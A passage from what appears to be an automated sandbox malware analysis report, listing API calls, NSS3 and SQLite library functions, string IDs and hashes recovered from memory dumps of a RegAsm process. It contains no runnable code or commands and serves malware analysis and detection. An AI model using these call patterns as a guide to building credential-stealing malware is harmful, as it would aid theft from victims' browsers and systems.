                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A551E4B6A002219BEB00CF65DC40F5A3379AF6136CF950065DD14ABF91EB30E925CB92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                                  • String ID: v10
                                                                                                                                                                                                                                                                  • API String ID: 2733184300-1337588462
                                                                                                                                                                                                                                                                  • Opcode ID: 9429eeae7bf5a7528f21b0232d197a0eff8be50cab6ea93a15bb8372693a4ed7
                                                                                                                                                                                                                                                                  • Instruction ID: 66fd29d6e76afeb09774b313293b398b0a4ce8609c4e547abed7e25eed0f0ce9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9429eeae7bf5a7528f21b0232d197a0eff8be50cab6ea93a15bb8372693a4ed7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73319DB1900209ABCB10DFA5DC81AEEBB78EF41318F10413FF812BA2C5D7789A55CB58
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DF13
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: __CxxThrowException@8.LIBCMT ref: 0041E6EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6FB
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DF35
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040DF72
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                  • API String ID: 214693668-4289949731
                                                                                                                                                                                                                                                                  • Opcode ID: 71546864f35c6454175b9f3c75e117220484c34095eb5b797ca96b614d6560d5
                                                                                                                                                                                                                                                                  • Instruction ID: 5e1b1f21c9a17b45a8e0b3de6546786a39637799ffb93c4359a5db00ffc7c7ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71546864f35c6454175b9f3c75e117220484c34095eb5b797ca96b614d6560d5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D1190317002059FDB24DEA8D981A6AB3E9EF15704B50493EF853EB6C1C7B4E9488799
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042653E), ref: 0040FC8D
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FC94
                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FCA0
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040FCCB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                  • String ID: >eB
                                                                                                                                                                                                                                                                  • API String ID: 1243822799-1374465750
                                                                                                                                                                                                                                                                  • Opcode ID: a5f7bcd971ff961b3dff2ec6cc91d00129f8b28e61a3b6feaf5a124593096c29
                                                                                                                                                                                                                                                                  • Instruction ID: eea17023b1511be057686bca1c183b4027cfc0da394c6b4b4e3fa5c11049d416
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5f7bcd971ff961b3dff2ec6cc91d00129f8b28e61a3b6feaf5a124593096c29
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0FEAA900128BBDB509BD99D09AFF76FDEF0DA02F041041FB41E5091E6788A94D7B4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8A9CF2
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8A9D45
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8A9D8B
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8A9DDE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                  • Opcode ID: a8df98b92fe8bec7e59d51ea87da19e5c670dc0837da0758aae7d8f2b8976821
                                                                                                                                                                                                                                                                  • Instruction ID: e6570f32f8b284f1021599feb871cbb5d6a7ce34844fcb920083aff49806986c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8df98b92fe8bec7e59d51ea87da19e5c670dc0837da0758aae7d8f2b8976821
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27A1F134708702DBDB2D9FA5DA9877A37B1BB47315F08882CD5064BA40DB3AD847CB92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411041
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00411063
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C92: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411090,00000000,?,00000000,?), ref: 00410C9D
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C92: HeapAlloc.KERNEL32(00000000,?,00411090,00000000,?,00000000,?), ref: 00410CA4
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C92: wsprintfW.USER32 ref: 00410CB5
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 004110EA
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 004110F8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 004110FF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1628159694-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4685ca07d02a4720ff44245328d031b00118815223fea7385c58c5583d29c71c
                                                                                                                                                                                                                                                                  • Instruction ID: 18722114c2d27e3fbb326af6cdcadb769d84b464389158dcfe7cd7da56484696
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4685ca07d02a4720ff44245328d031b00118815223fea7385c58c5583d29c71c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3317C72901129AFDB21DBA1CC899EFBB7DFF0A750F10402AFA05E6151DB345A85CBE4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000,00000000), ref: 6C91ADA7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000,00000000), ref: 6C91ADB4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,6C913FFF,?,?,?,?,6C913FFF,00000000,?,?,?,?,?,6C911A1C,00000000), ref: 6C91ADD5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C968D2D,?,00000000,?), ref: 6C96FB85
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C96FBB1
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA394B0,?,?,?,?,?,?,?,?,6C913FFF,00000000,?), ref: 6C91ADEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C913FFF), ref: 6C91AE3C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2a91d0e4a008d814da67ed1c9f4746067c1a225c2dfc581e2951420212d47a59
                                                                                                                                                                                                                                                                  • Instruction ID: 4c6eb5ca33f9c3df2153467910b49df661f80c3ace56703b5fc278dcfe51ee4f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a91d0e4a008d814da67ed1c9f4746067c1a225c2dfc581e2951420212d47a59
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD112671E042196BF7109A659C52BBF73BCDFB124CF048228EC5996A41FB20E95D82A2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C951E10: TlsGetValue.KERNEL32 ref: 6C951E36
                                                                                                                                                                                                                                                                    • Part of subcall function 6C951E10: EnterCriticalSection.KERNEL32(?,?,?,6C92B1EE,2404110F,?,?), ref: 6C951E4B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C951E10: PR_Unlock.NSS3 ref: 6C951E76
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,6C93D079,00000000,00000001), ref: 6C93CDA5
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(?,6C93D079,00000000,00000001), ref: 6C93CDB6
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C93D079,00000000,00000001), ref: 6C93CDCF
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,6C93D079,00000000,00000001), ref: 6C93CDE2
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C93CDE9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C9738A2), ref: 6C973DB0
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C9738A2), ref: 6C973DBF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C9738A2), ref: 6C973DD9
                                                                                                                                                                                                                                                                  • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C9738A2), ref: 6C973DE7
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C9738A2), ref: 6C973DF8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1642359729-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9A5B56
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9A2CEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A2D02
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A2D1F
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A2D42
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A2D5B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BDC3
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BDCA
                                                                                                                                                                                                                                                                  • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BDE9
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BE21
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,00000000,?,6CA27AFE,?,?,?,?,?,?,?,?,6CA2798A), ref: 6CA2BE32
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3662805584-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_Free.NSS3(?), ref: 6CA27C73
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA27C83
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6CA27C8D
                                                                                                                                                                                                                                                                  • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA27C9F
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6CA27CAD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 105370314-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041A2BD
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __getptd_noexit.LIBCMT ref: 0041A497
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __amsg_exit.LIBCMT ref: 0041A4A4
                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041A2D4
                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041A2E2
                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041A2F2
                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A306
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004078EB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407E3A
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407E4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                  • API String ID: 3207582090-1885708031
                                                                                                                                                                                                                                                                  • Opcode ID: 5ba8d67d83ff45aac454dddabf38f0f9527c0a4ba5204d8a2f286889d6b47792
                                                                                                                                                                                                                                                                  • Instruction ID: aad6668445d37f7ad79c688ef8f576ef062d2ad3d292c806b0f1f9f3b094801c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ba8d67d83ff45aac454dddabf38f0f9527c0a4ba5204d8a2f286889d6b47792
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3126970904249EADF15EBE4C856BEEBB74AF15308F1440BEA006735C2EB781B4CDB65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8B7D35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
